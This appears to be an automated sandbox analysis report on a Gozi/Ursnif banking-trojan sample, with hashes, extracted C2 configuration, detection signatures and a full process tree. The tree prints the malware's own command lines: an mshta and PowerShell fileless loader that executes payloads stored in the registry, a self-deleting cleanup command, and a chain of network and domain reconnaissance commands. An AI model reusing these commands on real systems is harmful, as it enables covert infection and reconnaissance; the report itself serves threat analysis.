Analysis
- max time kernel: 152s
- max time network: 140s
- platform: windows10-2004_x64
- resource: win10v2004-en-20220113
- submitted: 22/03/2022, 15:41

Static task: static1
Behavioral task: behavioral1
Sample: d41d05cc157f874f89c574c74c0e2c58.exe
Resource: win7-20220311-en

General
- Target: d41d05cc157f874f89c574c74c0e2c58.exe
- Size: 739KB
- MD5: d41d05cc157f874f89c574c74c0e2c58
- SHA1: 1e0df409d72db144f570b9d8410b544c8670e64d
- SHA256: 0d4702dec67009d0728ce6da88bd91bf5e70a526cf0688cc7c7586937cf06cb2
- SHA512: fa36e9217d4af43d14870e0fdc380e3ce25674ca0ff55faba604e3b025be06e9c01fadb2807a6809962defc353ca21ea85218115e3624961d6989484115f20ba
Malware Config

Extracted
- gozi_ifsb
- 777999
- config.edge.skype.com
- 146.70.35.138
- 146.70.35.142
- base_path: /phpadmin/
- build: 250225
- exe_type: loader
- extension: .src
- server_id: 50

Extracted
- gozi_ifsb
- 777999
- config.edge.skype.com
- 67.43.234.14
- 67.43.234.37
- 67.43.234.47
- base_path: /images/
- build: 250225
- exe_type: worker
- extension: .src
- server_id: 50
Signatures
- suricata: ET MALWARE Ursnif Payload Request (cook32.rar)
- suricata: ET MALWARE Ursnif Payload Request (cook64.rar)
- suricata: ET MALWARE Ursnif Variant CnC Beacon
- suricata: ET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F)
- suricata: ET MALWARE Ursnif Variant CnC Data Exfil

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
- description: Key value queried
  ioc: \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation
  Process: mshta.exe
Suspicious use of SetThreadContext 8 IoCs
- PID 1268 set thread context of 1648: pid 1268, Process d41d05cc157f874f89c574c74c0e2c58.exe, procid_target 80
- PID 1464 set thread context of 3032: pid 1464, Process powershell.exe, procid_target 39
- PID 3032 set thread context of 3428: pid 3032, Process Explorer.EXE, procid_target 35
- PID 3032 set thread context of 5092: pid 3032, Process Explorer.EXE, procid_target 98
- PID 3032 set thread context of 3752: pid 3032, Process Explorer.EXE, procid_target 33
- PID 3032 set thread context of 3944: pid 3032, Process Explorer.EXE, procid_target 30
- PID 5092 set thread context of 3440: pid 5092, Process cmd.exe, procid_target 100
- PID 3032 set thread context of 1036: pid 3032, Process Explorer.EXE, procid_target 108

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Discovers systems in the same network 1 TTPs 3 IoCs
- pid 3076, Process net.exe
- pid 1660, Process net.exe
- pid 3616, Process net.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs
- pid 3560, Process tasklist.exe

Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
- pid 4256, Process systeminfo.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs
- pid 3440, Process PING.EXE

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
- pid 3440, Process PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
- pid 3032, Process Explorer.EXE

Suspicious behavior: MapViewOfSection 7 IoCs
- pid 1464, Process powershell.exe
- pid 3032, Process Explorer.EXE
- pid 3032, Process Explorer.EXE
- pid 3032, Process Explorer.EXE
- pid 3032, Process Explorer.EXE
- pid 5092, Process cmd.exe
- pid 3032, Process Explorer.EXE

Suspicious use of AdjustPrivilegeToken 8 IoCs
- Token: SeDebugPrivilege, pid 1464, Process powershell.exe
- Token: SeShutdownPrivilege, pid 3032, Process Explorer.EXE
- Token: SeCreatePagefilePrivilege, pid 3032, Process Explorer.EXE
- Token: SeShutdownPrivilege, pid 3032, Process Explorer.EXE
- Token: SeCreatePagefilePrivilege, pid 3032, Process Explorer.EXE
- Token: SeShutdownPrivilege, pid 3032, Process Explorer.EXE
- Token: SeCreatePagefilePrivilege, pid 3032, Process Explorer.EXE
- Token: SeDebugPrivilege, pid 3560, Process tasklist.exe

Suspicious use of SetWindowsHookEx 1 IoCs
- pid 3032, Process Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs
Processes
- C:\Windows\System32\RuntimeBroker.exe (PID 3944)
  Command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
- C:\Windows\System32\RuntimeBroker.exe (PID 3752)
  Command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
- C:\Windows\System32\RuntimeBroker.exe (PID 3428)
  Command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
- C:\Windows\Explorer.EXE (PID 3032)
  Command line: C:\Windows\Explorer.EXE
  Signatures: Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: GetForegroundWindowSpam; Suspicious behavior: MapViewOfSection; Suspicious use of AdjustPrivilegeToken; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe (PID 1268)
    Command line: "C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe"
    Signatures: Suspicious use of SetThreadContext; Suspicious use of WriteProcessMemory
    - C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe (PID 1648)
      Command line: "C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe"
      Signatures: Suspicious behavior: EnumeratesProcesses
  - C:\Windows\System32\mshta.exe (PID 4748)
    Command line: "C:\Windows\System32\mshta.exe" "about:<hta:application><script>Dsq4='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dsq4).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\3B357854-5E29-2581-409F-72297443C66D\\\PlayStop'));if(!window.flag)close()</script>"
    Signatures: Checks computer location settings; Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1464)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rnxokhs -value gp; new-alias -name ciaisbj -value iex; ciaisbj ([System.Text.Encoding]::ASCII.GetString((rnxokhs "HKCU:Software\AppDataLow\Software\Microsoft\3B357854-5E29-2581-409F-72297443C66D").StopLocal))
      Signatures: Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: MapViewOfSection; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe (PID 3680)
        Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\f52evw42\f52evw42.cmdline"
        Signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe (PID 3864)
          Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC0DC.tmp" "c:\Users\Admin\AppData\Local\Temp\f52evw42\CSC7C797FB70504A3AADFE5CB713FF399D.TMP"
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe (PID 208)
        Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hvjrxi0u\hvjrxi0u.cmdline"
        Signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe (PID 2044)
          Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC1B7.tmp" "c:\Users\Admin\AppData\Local\Temp\hvjrxi0u\CSCF687E3C2E95F45A4B0A5E441CCFA80AC.TMP"
  - C:\Windows\System32\cmd.exe (PID 5092)
    Command line: "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe"
    Signatures: Suspicious use of SetThreadContext; Suspicious behavior: MapViewOfSection; Suspicious use of WriteProcessMemory
    - C:\Windows\system32\PING.EXE (PID 3440)
      Command line: ping localhost -n 5
      Signatures: Runs ping.exe; Suspicious behavior: CmdExeWriteProcessMemorySpam
  - C:\Windows\system32\cmd.exe (PID 4524)
    Command line: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\96B8.bi1"
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\nslookup.exe (PID 1308)
      Command line: nslookup myip.opendns.com resolver1.opendns.com
  - C:\Windows\system32\cmd.exe (PID 3548)
    Command line: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\96B8.bi1"
  - C:\Windows\system32\cmd.exe (PID 3224)
    Command line: cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\48C0.bin1"
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\systeminfo.exe (PID 4256)
      Command line: systeminfo.exe
      Signatures: Gathers system information
  - C:\Windows\syswow64\cmd.exe (PID 1036)
    Command line: "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
  - C:\Windows\system32\cmd.exe (PID 4156)
    Command line: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"
  - C:\Windows\system32\cmd.exe (PID 1572)
    Command line: cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net.exe (PID 3076)
      Command line: net view
      Signatures: Discovers systems in the same network
  - C:\Windows\system32\cmd.exe (PID 3412)
    Command line: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"
  - C:\Windows\system32\cmd.exe (PID 2360)
    Command line: cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"
    - C:\Windows\system32\nslookup.exe (PID 428)
      Command line: nslookup 127.0.0.1
  - C:\Windows\system32\cmd.exe (PID 4860)
    Command line: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"
  - C:\Windows\system32\cmd.exe (PID 2688)
    Command line: cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"
    - C:\Windows\system32\tasklist.exe (PID 3560)
      Command line: tasklist.exe /SVC
      Signatures: Enumerates processes with tasklist; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\cmd.exe (PID 3620)
    Command line: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"
  - C:\Windows\system32\cmd.exe (PID 5068)
    Command line: cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"
    - C:\Windows\system32\driverquery.exe (PID 1528)
      Command line: driverquery.exe
  - C:\Windows\system32\cmd.exe (PID 948)
    Command line: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"
  - C:\Windows\system32\cmd.exe (PID 868)
    Command line: cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"
    - C:\Windows\system32\reg.exe (PID 4732)
      Command line: reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
  - C:\Windows\system32\cmd.exe (PID 3696)
    Command line: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"
  - C:\Windows\system32\cmd.exe (PID 220)
    Command line: cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"
    - C:\Windows\system32\net.exe (PID 1812)
      Command line: net config workstation
      - C:\Windows\system32\net1.exe (PID 2584)
        Command line: C:\Windows\system32\net1 config workstation
  - C:\Windows\system32\cmd.exe (PID 2072)
    Command line: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"
  - C:\Windows\system32\cmd.exe (PID 4208)
    Command line: cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"
    - C:\Windows\system32\nltest.exe (PID 4080)
      Command line: nltest /domain_trusts
  - C:\Windows\system32\cmd.exe (PID 4852)
    Command line: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"
  - C:\Windows\system32\cmd.exe (PID 4264)
    Command line: cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"
    - C:\Windows\system32\nltest.exe (PID 3592)
      Command line: nltest /domain_trusts /all_trusts
  - C:\Windows\system32\cmd.exe (PID 3572)
    Command line: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"
  - C:\Windows\system32\cmd.exe (PID 4524)
    Command line: cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"
    - C:\Windows\system32\net.exe (PID 1660)
      Command line: net view /all /domain
      Signatures: Discovers systems in the same network
  - C:\Windows\system32\cmd.exe (PID 3972)
    Command line: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"
  - C:\Windows\system32\cmd.exe (PID 2788)
    Command line: cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"
    - C:\Windows\system32\net.exe (PID 3616)
      Command line: net view /all
      Signatures: Discovers systems in the same network
  - C:\Windows\system32\cmd.exe (PID 980)
    Command line: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"
  - C:\Windows\system32\cmd.exe (PID 1800)
    Command line: cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\48C0.bin1 > C:\Users\Admin\AppData\Local\Temp\48C0.bin & del C:\Users\Admin\AppData\Local\Temp\48C0.bin1"